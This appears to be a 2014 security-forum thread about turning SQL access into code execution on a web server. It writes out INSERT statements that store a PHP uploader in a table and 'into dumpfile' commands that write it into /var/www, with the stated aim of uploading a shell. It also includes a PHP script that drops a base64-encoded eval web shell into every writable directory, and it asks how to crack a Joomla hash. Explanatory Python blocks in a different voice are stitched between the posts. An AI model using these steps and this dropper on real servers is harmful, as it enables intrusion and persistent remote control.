DrMTR Posted November 3, 2014

Hi to all! I am testing a vulnerable app on localhost and trying to insert PHP upload form code into a DB table, but it gives me a MySQL syntax error every time I try.

This HTML form was successfully inserted into the DB via SQLmap:

    insert into userform values ('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
    <html>
    <head><title>Upload File</title></head>
    <body>
    <form enctype="multipart/form-data" action="uploader.php" method="POST">
    <input type="hidden" name="MAX_FILE_SIZE" value="100000" />
    Choose a file to upload: <input name="uploadedfile" type="file" /><br />
    <input type="submit" value="Upload File" />
    </form>
    </body>
    </html>');

but this one gives me an SQL syntax error in line 1 every time I try to insert it into the DB:

    insert into user_upload values ('
    <?php
    $target_path = '/var/www/';
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
        echo "The file ". basename( $_FILES['uploadedfile']['name']). " has been uploaded";
    } else{
        echo "There was an error uploading the file, please try again!";
    }
    ?>');

Where is the problem? I forgot to tell you that the DB tables are already created in the DB exploitdb.
digininja Posted November 3, 2014

You have a quoted string which you are breaking out of with quotes in the lines you are injecting; try changing all the quotes in the string to double quotes and the outside ones to single. Sounds like an interesting vulnerability where you can pull contents from a database and get them executed.
DrMTR (Author) Posted November 3, 2014

Yeah, it's single quotes, but why then was the first form (HTML form) inserted successfully into the DB while the second gives me an SQL error? Can you change the quotes and then try to insert into the DB table again?
cooper Posted November 3, 2014

The way SQL works is that when you want to put a string in a column, you say:

    insert into table (column_name) values ('THE_DATA_TO_INSERT');

Note that the data to insert into column_name is delimited by the single quotes. When that THE_DATA_TO_INSERT itself contains single quotes, you need to escape them either by preceding each single quote with a slash (\') or, because HTML allows you to do this, use a double quote (") instead of the single quote character in your data.
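To make cooper's point concrete, here is an added example (mine, not from the thread) that runs the same INSERT three ways against an in-memory SQLite table standing in for the MySQL one: pasted between quotes as in the first post, with the quotes escaped by doubling, and as a parameterized query. The data is a constructed sample made of the first two lines of the thread's PHP uploader, which contain the single quotes that broke the statement.

```python
import sqlite3

# Constructed sample: the first two lines of the PHP uploader from the thread,
# which contain the single quotes that broke the INSERT.
PHP_SNIPPET = (
    "<?php $target_path = '/var/www/'; "
    "$target_path = $target_path . basename($_FILES['uploadedfile']['name']); ?>"
)


def fresh_db():
    """In-memory SQLite stand-in for the MySQL table; the quoting rules are the same."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_upload (body TEXT)")
    return conn


def insert_by_concatenation(conn, data):
    """The thread's approach: paste the data between two single quotes.
    The first ' inside data ends the literal and the rest is parsed as SQL."""
    conn.execute("INSERT INTO user_upload VALUES ('" + data + "')")


def insert_with_escaping(conn, data):
    """Doubling every ' is the SQL-standard escape; MySQL also accepts \\'."""
    conn.execute("INSERT INTO user_upload VALUES ('" + data.replace("'", "''") + "')")


def insert_parameterized(conn, data):
    """The driver sends the data out of band, so no quote can ever end the literal."""
    conn.execute("INSERT INTO user_upload VALUES (?)", (data,))


def stored_rows(conn):
    return [row[0] for row in conn.execute("SELECT body FROM user_upload")]


def demonstrate(data=PHP_SNIPPET):
    """Try all three methods on the same data and report what happened."""
    conn = fresh_db()
    try:
        insert_by_concatenation(conn, data)
        concat = "inserted"
    except sqlite3.Error as exc:
        concat = "rejected: " + type(exc).__name__ + ": " + str(exc)
    insert_with_escaping(conn, data)
    insert_parameterized(conn, data)
    # Both safe methods store the text byte-for-byte, quotes included.
    return {"concat": concat, "rows": stored_rows(conn)}
```

The concatenated statement is rejected by the parser exactly as MySQL rejected it in the first post, while the other two store the snippet unchanged; the parameterized form is the one an application should use, since it also closes the injection route the thread is exploiting.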
digininja Posted November 3, 2014

If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green, meaning it is all considered a single string; in the second example, where the single quotes are closed early, the text changes to black then back to green where the single quotes open again.
DrMTR (Author) Posted November 5, 2014

> If you look at the syntax highlighted code you've provided you'll see that in the first example all that is being inserted is green, meaning it is all considered a single string; in the second example, where the single quotes are closed early, the text changes to black then back to green where the single quotes open again.

So in fact if I change the "blacklighted text" into " " it will be OK?

    insert into user_upload values ('
    <?php
    $target_path = "/var/www/";
    $target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]);
    if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) {
        echo "The file ". basename( $_FILES["uploadedfile"]["name"]). " has been uploaded";
    } else{
        echo "There was an error uploading the file, please try again!";
    }
    ?>');
digininja Posted November 5, 2014

That looks ok, try it and see. What are you exploiting? I'm curious about what vulnerability pulls code from a database and executes it.
DrMTR (Author) Posted November 5, 2014

Yeah, SQL code inserted into the DB table, and it executes into an evil PHP uploader. Grab the content from the SQL table and dump it to a .php file using these commands:

    select * into dumpfile '/var/www/uploadform.php' from userform;
    select * into dumpfile '/var/www/uploader.php' from user_upload;

After that simply execute uploadform.php and upload your favorite shell onto the host. Thanks for everything guys. :)
digininja Posted November 5, 2014

That makes sense, I was thinking it was executing from the database. If you've got file write permissions you've probably also got read permissions, if you've not checked that already.
DrMTR (Author) Posted November 5, 2014

Yeah, you must have /var/www/ writable :)
digininja Posted November 5, 2014

Or have local file inclusion. I tend to look for file upload features on sites which allow uploads into the document root, usually folders called userdata or uploads; they are writable when the rest isn't.
cooper Posted November 6, 2014

Which distro uses /var/www for this though? On my Gentoo's Apache install the root folder is /var/www/<hostname>/htdocs for instance.
i8igmac Posted November 8, 2014

I'll provide some of my exciting automation :-p This little snippet will recursively scan directories for writable permissions and then write a small shell... If you have PHP execution, phpinfo(); then try eval(codebelow); careful, this may write a few thousand shells to your hard drive :-)

    chdir('../');
    $path = realpath(getcwd());
    $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST);
    foreach($objects as $name => $object){
        if (is_dir($name)) {
            if (is_writable($name)) {
                echo $name . ' ';
                file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4="));
            }
        }
    }
DrMTR (Author) Posted November 13, 2014

^^ Thanks for the script. It's very useful for finding writable folders. I don't want to open a new thread; does someone know why this Joomla hash is very long compared with the other hashes in the DB: $2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB. How to crack this one?
cooper Posted November 14, 2014

Fields are separated by the $ character. 2y means "The most secure version of Blowfish". 10 is the amount of blowfish iterations. The remainder is the blowfish hash where I suspect the bit up to the slash is the salt and the remainder the actual hash value.
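To pull the fields apart as cooper describes, here is an added parser (my own example, not from the thread): it splits the identifier, cost, salt and hash and checks that the string is a complete bcrypt hash. In bcrypt the salt is always the first 22 characters after the third $ and the hash the remaining 31, with / being an ordinary character of bcrypt's base64 alphabet; the cost is the base-2 logarithm of the key-setup rounds. Run on the hash pasted in the question it reports 59 characters, one short of a full 60, so my assumption is that a character was lost when the value was copied out of the database.

```python
import re

# The hash exactly as pasted in the post above (not a constructed value).
JOOMLA_HASH = "$2y$10$bTQfeWF8vHD3BJ/RvoMm4uLWBD02O/YPQN9Y0NfiRlHyHlmD1FmB"

# bcrypt's own base64 alphabet; '/' is an ordinary character in it,
# so the slash says nothing about where the salt ends.
BCRYPT_RE = re.compile(r"^\$(?P<ident>2[abxy]?)\$(?P<cost>\d{2})\$(?P<rest>[./A-Za-z0-9]+)$")

SALT_LEN, HASH_LEN = 22, 31  # fixed widths after the third '$'


def is_bcrypt(s):
    """True if the string has the $2?$NN$ prefix and alphabet of a bcrypt hash."""
    return BCRYPT_RE.match(s) is not None


def parse_bcrypt(s):
    """Split a bcrypt modular-crypt string into its fields and sanity-check it.

    Layout: $<ident>$<cost>$<22-char salt><31-char hash>, 60 characters in total.
    This only describes the structure; it does not verify or recover passwords.
    """
    m = BCRYPT_RE.match(s)
    if m is None:
        raise ValueError("not a bcrypt-formatted string")
    rest, cost = m.group("rest"), int(m.group("cost"))
    problems = []
    if len(rest) != SALT_LEN + HASH_LEN:
        problems.append("expected %d salt+hash characters, got %d"
                        % (SALT_LEN + HASH_LEN, len(rest)))
    if not 4 <= cost <= 31:
        problems.append("cost %d outside the bcrypt range 4..31" % cost)
    return {
        "ident": m.group("ident"),   # 2y is the identifier PHP's crypt() uses for bcrypt
        "cost": cost,
        "rounds": 2 ** cost,          # the cost is log2 of the key-setup rounds
        "salt": rest[:SALT_LEN],
        "hash": rest[SALT_LEN:],
        "length": len(s),
        "complete": not problems,
        "problems": problems,
    }
```

A hash that fails the completeness check will never verify against any password, which is worth knowing before spending any compute on it.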